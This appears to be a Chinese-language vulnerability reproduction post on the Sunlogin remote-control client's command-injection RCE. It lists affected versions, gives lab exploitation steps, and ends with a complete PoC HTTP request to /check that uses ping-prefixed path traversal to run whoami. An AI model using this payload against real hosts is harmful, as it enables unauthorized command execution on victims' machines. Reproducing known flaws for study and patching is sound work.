一、介紹

向日葵遠端控制是一款面向企業和專業人員的遠端pc管理和控制的服務軟體。可以在任何有網路的情況下，輕鬆訪問並控制安裝了向日葵客戶端的遠端主機。同時還能實現遠端檔案傳輸、遠端視訊監控等功能，這不僅為使用者的使用帶來很多便捷，還能為其提供各類保障。

Sunlogin RCE 是漏洞發生在介面/check處，當引數cmd的值以ping或者nslookup開頭時可以構造命令實現遠端命令執行利用，客戶端開啟客戶端會自動隨機開啟一個大於40000的埠號。

二、影響版本

客戶端版本：

• 11.1.1
• 10.3.0.27372
• 11.0.0.33162

三、漏洞復現

向日癸客戶端版本：11.0.0.33162

作業系統：win10

目標靶機IP地址：192.168.18.129

1、安裝向日葵客戶端，並執行

2、使用御劍高速掃描埠工具對靶機IP進行40000埠以上的掃描

通過curl驗證一下存在漏洞

使用getCID指令碼獲取一下token，放到poc的cookie中驗證

可以成功執行命令

使用指令碼可以自動獲取token並執行命令

附poc：

GET /check?cmd=ping../../../../../../../../../../../windows/system32/whoami HTTP/1.1
Host: 192.168.200.209:50915
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Cookie: CID=ciiHpsOHS1UtC5ZfZMrA1gApw9htv8ph